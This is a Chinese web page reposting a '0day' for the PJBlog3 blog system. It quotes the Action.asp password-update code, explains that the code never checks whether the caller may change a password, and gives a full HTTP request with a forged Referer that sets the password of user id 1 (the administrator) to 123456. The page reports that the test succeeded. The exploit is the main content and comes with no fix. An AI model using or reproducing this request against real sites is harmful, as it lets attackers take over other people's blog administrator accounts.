PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码0day
来源:互联网 发布:js瀑布流原理 编辑:程序博客网 时间:2024/05/06 19:39
PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术 在文件Action.asp中: 测试方法:
ElseIf Request.QueryString(“action”) = “updatepassto” Then //第307行
If ChkPost() Then
Dim e_Pass, e_RePass, e_ID, e_Rs, e_hash, d_pass
e_ID = CheckStr(UnEscape(Request.QueryString(“id”)))
e_Pass = CheckStr(UnEscape(Request.QueryString(“pass”)))
e_RePass = CheckStr(UnEscape(Request.QueryString(“repass”)))
Set e_Rs = Server.CreateObject(“Adodb.Recordset”)
e_Rs.open “Select * From [blog_Member] Where [mem_ID]=”&e_ID, Conn, 1, 3
e_hash = e_Rs(“mem_salt”)
d_pass = SHA1(e_Pass&e_hash)
e_Rs(“mem_Password”) = d_pass
e_Rs.update
e_Rs.Close
Set e_Rs = nothing
response.Write(“1″)
Else
response.write lang.Err.info(999)
End If
程序在修改用户的密码时,没有对用户的合法权限做验证,导致攻击者可以修改任意用户的密码。
//需修改Referer值通过程序检测
GET /action.asp?action=updatepassto&id=1&pass=123456&repass=test HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.heimian.com/test.htm
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler 4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: 127.0.0.1
Connection: Keep-Alive
Cookie: PJBlog3Setting=ViewType=normal; PJBlog3=memRight=000000110000&memHashKey=&memName=&DisValidate=False&memLastpost=2009%2D11%2D08+11%3A18%3A27&exp=2010%2D11%2D8&Guest=%7Brecord%3Atrue%2Cusername%3A%27test%27%2Cuseremail%3A%27ww%40126%2Ecom%27%2Cuserwebsite%3A%27http%3A%2F%2Fwww%2Ebaidu%2Ecom%2Findex%3F%26lt%3Bfff%26gt%3B%27%7D; ASPSESSIONIDASDSSADD=DAMNKLBDKADFCKOGKEJOKJPP; ASPSESSIONIDCQCQTBCD=MOJFLCCDBICHALBBGGMMENML
(测试结果:成功修改管理密码)
- PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码0day
- Oracle 修改任意用户密码
- [卡巴斯基删除任意文件-0day]
- 微信任意用户密码修改漏洞分析
- 微信任意用户密码修改漏洞分析
- 开源微博EasyTalk任意用户密码修改 (变量覆盖)
- 聚美优品任意修改用户密码(非爆破)
- 杰奇小说连载系统任意文件上传0day
- 杰奇小说连载系统任意文件上传0day
- ewebeditor PHP 3.8版本上传任意文件0day
- MySQL修改用户密码与导入SQL文件
- day 12 用户密码管理
- 0day-java load dynamic library from any path(java加载任意目录库文件)
- 0day-java load dynamic library from any path(java加载任意目录库文件)
- 『原创』PHP168 0DAY 任意文件下载漏洞利用工具
- 用户密码修改
- 修改用户密码
- 修改用户密码
- Delphi 判断数据库表是否存在
- 用C语言判断系统大小端模式
- Spring自定义属性编辑器
- 微博:45度仰角的未来(一)冲击搜索引擎与门户网站
- 动态绑定以及方法签名
- PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码0day
- PB9升级到pb115实战经验总结
- 2011.06.26
- BackTrack5-KDE-X64 无法启动的问题
- iPhone设置sectionHeader方法
- 在打开net或新建的时候出现未能加载文件或程序集prcp.nlp或它的某个依赖项系统找不到指定文件是怎么回事啊
- 将sql数据库字段char全部转换成varchar
- 源码方式安装软件
- javascript控制Table的TD宽度1